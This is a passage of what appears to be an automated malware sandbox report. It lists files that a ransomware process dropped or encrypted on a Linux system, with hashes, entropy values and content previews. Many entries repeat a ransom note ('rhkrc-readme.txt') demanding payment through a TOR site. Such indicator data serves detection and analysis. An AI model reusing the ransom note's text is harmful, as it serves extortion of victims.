                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/evolution/sources/system-proxy.source
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):520
                  Entropy (8bit):6.756317599965169
                  Encrypted:false
                  SSDEEP:12:Dwk0r3AU091uic9dSGL2DcUB2RXtzLjap:DRa3A516x2DfW9zLjap
                  MD5:683CCB162BC05F3C545D5EEBDA828E2D
                  SHA1:F2C9685DBD69A3F4BD9D09228B4B2813641AC031
                  SHA-256:541F1DBFB185D92479CC6667D54148C13453AF14D460A140486B3BCC7C604F26
                  SHA-512:89519D26ECDAAA375468C710D599A86ADF2CD1C4C47474ED571A457C512DFC91A25550F0F73B9F4BB2169BF23B44DFF6F52B523EF1B4FB70E8E24952738CC0D1
                  Malicious:false
                  Reputation:low
                  Preview: .S..4&...".>.Q.......D.."....^... R.<3...xV..9..La.........u........T.\.:qP...T.....kSPF........$.WJL...........*....q=.<..x.J5#z...q.S...+..E.8......#.-<....7:..?6...IY..b.l.@&f?..i.....W.L...$.4..M...o.........\lB,..W...LpA>E.%....x...^.j..&X.hn...,[H....+...y]....x=eBQ*....p8h.j.e.A.i%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................&G...0S...v<sA.]3..d:.%-*...... ..h.[;.s..^...........D.
                  /home/user/.config/gedit/accels
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):334
                  Entropy (8bit):5.914064064352625
                  Encrypted:false
                  SSDEEP:6:76pH/2haPfVQ2vLtT1zmhOO/EUyp6XcJHGM6OI:42Mfjx2DcUBWz6x
                  MD5:93F566D12166EC75C0EF83823B76D979
                  SHA1:2767BF140AB5C260C70564F01781481320B9F80C
                  SHA-256:CBF57934D1EC185A511ACDE01576B94C85889E73256D16E568BFE65E9D56046D
                  SHA-512:FFE4F6E3EAA6190EE459B51BA5D50CBAD1ED9BDAB287E270A10858286F3C548442658AB5335693A6E736AAF879741EFAB81560DD0F2271C6E16D4302BF2DD7A9
                  Malicious:false
                  Reputation:low
                  Preview: .u....Q...S.DU.[..@.....OJ%-:._.5..J.9.Y!.%6..3...|...01..S..w.J....U.....z.D.r..%...,.Cy..J..d....>0.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.........................................................................................;D5I..V{X.!."...d.{F;...]...Ie.\L+....J.h..........+%.k
                  /home/user/.config/gedit/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/ibus/bus/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/ibus/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libaccounts-glib/accounts.db
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):12520
                  Entropy (8bit):7.979975368377875
                  Encrypted:false
                  SSDEEP:384:reLgua5zjXw9/WhXuY9bhZL4lSWO+eUUBeyRN4ac4KN:K0ua8W1f99ZUJO+eUU0yRnyN
                  MD5:6FAFE97A9EB4E10BF830D2D2A301EA2E
                  SHA1:A33B62174A8180CA690C9F4815945F16FA820AFE
                  SHA-256:BB2C3115329FCE868D23615AD83C8FA9245B78BD2930305AD40A27430FE1454A
                  SHA-512:1FDDECE22443238FCC8A6AF5DF62C1B2C7921C23564ABF11F2A79846E257B22F43E55FC865945E34ED571D89AB725D5CDAEA4CD6A0C9BC26B5B4D4BD1BBDC553
                  Malicious:false
                  Reputation:low
                  Preview: ~0L........+....l&..9..@...\....q.(......c.._.9h.t@Z...J.o.3...F.....0..i..i[]....l.9...!.K....C.|,.D...~....F.@...ru{.c..~....~h..<.....F.E>....b.}v.&.............%..|9V.d..]...Z2...!.....F9+=W.F~2).vT....S......k.......M?Q... 6....<..Ren.7F...b..h...f..q<.......T....p.....%..sD`X..$O..*cjB.ly.4..../#....8.]..tL.........5..*.ny>.R....{..!3.?.....{...!.`.u.p....|.4...).C!.hd.*.... s..f..a..vh,.u..........t..!%......8..f..mq..u.v}?0n....&I....#.,.....y5..\z.....b...*g.._..T].....@&*......A.K.....A.......BBR.....S.k}...+.t.Vt......Q......4.(..)........].T.6. .P0 1r....@{'...A.#"...^).Q.{#C..Z.7+....(4<&R.j|/...r...`u....D\...c.e..t$.....{._.d..q....'....]...........6;.-.o.QoA..s>...N......x.<..,C...g...`.......A..Sa......(........k'.n..F}.$..5j.....0....b.......`)........\sH....D^W'..X4....e...4j&A.c<.........P...>Iq........I#D.d..{.2...t.<...P}\.*6Z..Ekr..((z+K#..O.^......x"$9r....GOGE+uX.D.D.w1~PX:.3!..lR.S+Y......*.oK....'>]'`..1<e...... .1.aq._....2.<i?..o...."yY.......M..9os........
                  /home/user/.config/libaccounts-glib/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/autocorr/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/autotext/mytexts.bau
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):789
                  Entropy (8bit):7.277532409901701
                  Encrypted:false
                  SSDEEP:24:9MgirIGPFp24L6xHL4QVsv2Gw+2Df9Wk+Aa:GdLNmlL4Isv21D83Aa
                  MD5:0B44822FAFF1C0A4AC913B0913BFE033
                  SHA1:53FD7280DC27B3EC416BBF78343340E4305E53D4
                  SHA-256:CDF88AAE5DEFB826B278AF4A0ECB40BCFC2F151F57DAC79CE622AA14F11632B6
                  SHA-512:FE38FF9F5E03D4C9616AB49E74217ADA83202ACF42529064AF7199122259CB488D33322FAEA7B04A71D0BD89A7883527596CC3B91EBB208CB1117135580C8A16
                  Malicious:false
                  Reputation:low
                  Preview: ..X..~D[P...}.$/.....](.<,..|...9X...$.P....H.}.>..w.r..f.O.w)..J...O`g.._.Y../<.M.).W.......~........... W.i......./..Ee...N6x.........<i.X.G..P.@..y.\w:^..+...;wk......a...P..|....x+......X..u#$..q...j\.......X...~..T.O.9.(.1S....+...`.mh..j/.F........D.R.".*-.....m..f`..X*...+O.....|l.W.....u.#m.2.e\...(..X..O..x+..'..vYPR../%.C._(....).E...?.{.K..O.QB..b..h..E..!W!...KI...P4..)T.9....n..9.....*.Fe..~......J...7....5f..bL.O.1..Cx.....uk?uP.?h(.......A1.c\..S/$.m.....N......y....O....V....VU.4.{O.p.U[T..0{3|......e....:.8.pE..t.N..QL....FwA.&....C.E%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp............................................................................................H.%....1..E..C,.......%Ez...d`.._.....[e.........SAW
                  /home/user/.config/libreoffice/4/user/autotext/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/basic/Standard/Module1.xba
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):1356
                  Entropy (8bit):7.642683891348134
                  Encrypted:false
                  SSDEEP:24:sgTu9wot9lykQw5tgZMRfPb8ekn/OWyt3pPmQo/R8uMo48O5HShS02DfD:sgGwcyklgMRfi/gXop8uMf8zSNDr
                  MD5:A764ED30054C258A4478A98968D36CCF
                  SHA1:29E7C52F4CA1045ABC79ADDCEBF6218CB85E065F
                  SHA-256:9C313A98191E8A7302CB3B8CA7827D7D566BB030B5760F2DD749C9764072A8CD
                  SHA-512:E4818B1C6ADD6D372EC9CE770277B7CFFC620601A0F0E5A6728D5084349900DEED5BF29EDC3E6C356E504A81A3395C22FB0F0B263B8A8E9AFD31662DAFD3BC0D
                  Malicious:false
                  Reputation:low
                  Preview: A.....X..&..ew.y..K..........l.P#..[...+.....,I..PrE..:#...w.BG.(.* ......YX........Q8..aGz.........u[.{'{\..D.(..F..........r.0.K.9.\.gqH|g....K..u.|bey*20......;.......B.s..D[k...b....d.3.S.Ec&....F.....YuY..Ij....W.#@..0..xD........M|Z.}>0..>.$&.+.K.N...xf8..6&.~`..h..'......8..RJP.N!S.....?3.P..C......K.+.u.._S...I..g...R......#..3......0k...............^.....NG........",6.....m#.N..u)..e;eRK.:&..Z..G.....y."...%....pK.P.UpB.ln...NJ'[w..L.k$.....-.;5...pH.;..].....~.. ]HN..7.^|.6..0.!?...1.M.[.....ue'.`g......4....1.1.....cY...'...LT..N|..T.i..........#....ZII......BS...#w..Cz.....Dc....w.a.).=....|..).I(..N..#.Z.*.{..-#].<U../..-F...,u.5.r%.4...rd.|u`......@.q.tB.A....`P%...6......|..E.l.z..E...{.x..-(5.'......Erb.u......f[l.>......y.....r..3e.1...j..J.......L.`...\..R.,..Z...0....G...........=..S....N.}.........J.&..P..t....4...Y...l4...D.g...S,9Wr..H._z...AX.^Rw.b=..@.......to?.Y)...,.Q....-.{......Z.'lhIM.(..:9Q..S.....o..._M.....07...r...!.k.....z.~.2..0/..7..S.N..i...$j..3.L.
                  /home/user/.config/libreoffice/4/user/basic/Standard/dialog.xlb
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):520
                  Entropy (8bit):6.81093507619154
                  Encrypted:false
                  SSDEEP:12:cn67uwgcU/Lv8mOVR2+jfEzBrQiBEr2DcUBzxufk3:t/uJOxszhQao2DfL3
                  MD5:C3ADA82F3244BD9D09174F8F2BAC5500
                  SHA1:ECD89A18862E385D302E17F9C56205B1412285BF
                  SHA-256:A1457E1C1AB9FB61B8C785528FAB32DB50EC64AFC9F8D7ACE47AE355EE043E5D
                  SHA-512:320986E345934073D5E3326C03F4904176865EDE73FD68A58F7FD79D642C02D79DE86A2679551D8A1A063A76ACF61B3042B8F28844CDAEC4FF604B1666B90E09
                  Malicious:false
                  Reputation:low
                  Preview: ..o0r.....A.*..t..4....~..@.?.;.,R..I..N..A..:..x..........O..q..2....K^......>E_.........{. .-..W/K.j.P.....>p....-.v"yhk .....x...s..).'.w...sT..7...p..n.......Y.z..rs.O.|.D.[..h.R?F>t......5...^......bs!.OS2..q..M..!d..F..vH...w.......Y.1.Y....Ip9.....M.F.._....1.%wF.J....X...B.G<...H%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.........................................................................................h...^."..P....8('sW....8U.....A......S....K...........j
                  /home/user/.config/libreoffice/4/user/basic/Standard/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/basic/Standard/script.xlb
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):581
                  Entropy (8bit):6.974464255399501
                  Encrypted:false
                  SSDEEP:12:MfeHz/ombh09wV0ER464/8CQvfXWjiswmdJZn2DcUBGIOXBBC9:oeHzQmnA64kCgXWusw6Zn2Df1l
                  MD5:9C2048178858D117F505332943DDEC40
                  SHA1:AC13662FB6A90F0980128CD8DB1FCE75B5104AEA
                  SHA-256:C8D9D6193D1B222D1EC6B8C63D717E0B8ED5F61C8326894E3AC598B5935FCA0A
                  SHA-512:4B3EA5625F394E6AF3F9DB7AB2A1CCEFB114D35288CC3C4F0A7482F0097A38A17F427199C2A26E8D70617F66A49F4FC32429E2BD0FA3C7F560951F83372038F2
                  Malicious:false
                  Reputation:low
                  Preview: %.$....Z..@I.ivt&.....9.)..E4gL5.A....... ....A.^.......lfb9`DD.`.!D..v|L....%...A>...3`J.C..I.V ......e....v..._e..Z.Q...O...^...b...W...?.A...*.aZ...PQ.[..6 .v....W...e......H'G....Q.?.j..l1...d.T.P..p.=.w.KF.f.........BA...AhY("..tN...6.Z.........zBY....a..{....tV)V........M..1.l..=.e3...%>..N$s.5n..z....\W...]c.....,~x.>.*......b...X.....2..b.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................q....X..!.......f.f..G..%Rd.:....a.......dH.........r.J.
                  /home/user/.config/libreoffice/4/user/basic/dialog.xlc
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):571
                  Entropy (8bit):6.9109385397511245
                  Encrypted:false
                  SSDEEP:12:RfgJInECvkqAU55fGMWJZ2LMsF+ULtJq6MYm9X2DcUBS/Iwkv:RoJInEYf/5BKs8ULtlMY+2DfgQwE
                  MD5:C1228C843ADA6DAFB4DA56A8865F17AE
                  SHA1:FF94E1BE57644D54BC13C59DE068969B4BD4D4FF
                  SHA-256:3F2E11028B4DD7AA85F9D134988C26C02E838EEC918ABD550ECC17522DF74595
                  SHA-512:1075280200724FB8B324289170047E5276FF1CF4D6948ADF3BCAE64A0FE26E0822EC4ECC7E435FF89AC6E9CB97FD7E8F53929802C19489B2620C7D26B101474B
                  Malicious:false
                  Reputation:low
                  Preview: p..$...a...Qd&...FzkKe.hW.n.."....$.?n..6..."..I.H-..UK .@.m.E-.0.....M....?N.y...9a1.L.O......B.bQ....-..S~U&%..ktOS...SU.....Si.9i00...=...c.A.....o........s!"...pL"C....w..3Y.<?B.........n..X."Vn..jd....I..<'......:/f:.1..?gO..Y......Mn`..:....o\K.....Wm.......[R>0..........e`....u....k....b.+.n...c+du.n.c.PW.JQA.q...n-.nn.t...Y......%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp..........................................................................................F@...,..)[..v....(.'g.hhJ...{..d&...".?M.[............
                  /home/user/.config/libreoffice/4/user/basic/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/basic/script.xlc
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):571
                  Entropy (8bit):6.934178867743625
                  Encrypted:false
                  SSDEEP:12:fOsMyr73yj36gHYu+T+9JL4Ne72DcUBjID:fLg3H6T+Tt72Df2
                  MD5:888BF9C1CCB043E7A2BB32EE350A9081
                  SHA1:A435E0FFD53FA99B179605D8324985D31FA466A3
                  SHA-256:8AC3FF1131F6DAAEF25C697F8A048737FE60A86A1A059391F670AB636B4A2626
                  SHA-512:55EC92FB9ABB627042CEC3B5A58D24E34350AAF80478365F160B8AC95033E40A4FD93C8DD19161C87442A2524BFE9EDB9A8CDE1391981C0AB5CE69A6814F4B1A
                  Malicious:false
                  Reputation:low
                  Preview: M..P.y..j'...-.G....2..bq.q.I^4.....'}..>.....=y..x.ZU},..8H]..4.`..*.I..9.......v;..e......jR.Y<...)......~.!]Xm6.x^&.....V>F.GV.v`7l...]I.2...cI.V.....0.aSW..#.....#..#.H.c.....%.0.......7..WF<.+..~../.>T..*s-..,...Va..PU9M...D-4}(lU%.J....U-....Y;\..P=.<...*...4....p.. .....8C0.F....N...X.N._(R.?.~.r~.O.f0. I.......:.....H...1..Al.y.n%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp...........................................................................................P.'.g...+!q...)..JB.3|..].j..-.<G1..J.&............Z.
                  /home/user/.config/libreoffice/4/user/config/autotbl.fmt
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):48640
                  Entropy (8bit):7.995570142220842
                  Encrypted:true
                  SSDEEP:768:kDOKEue4K+8yOy03XcWyWTxz9ICz9l4yUA3nYiSCNcj1tvfi9vFuf4gkzWeQ0EQO:s1Z6yO1yW/ICBl4g3LSCTNfgkg0zyV
                  MD5:4EB022E5A465CED96E12D5DF01CB386D
                  SHA1:6713C35ADDCC5BB60A3B0A60A3B84968BE6094D0
                  SHA-256:C3DB823778187146F428FBE59040FE5D6452E327A1C8459B1E2DAA053FDF6DD8
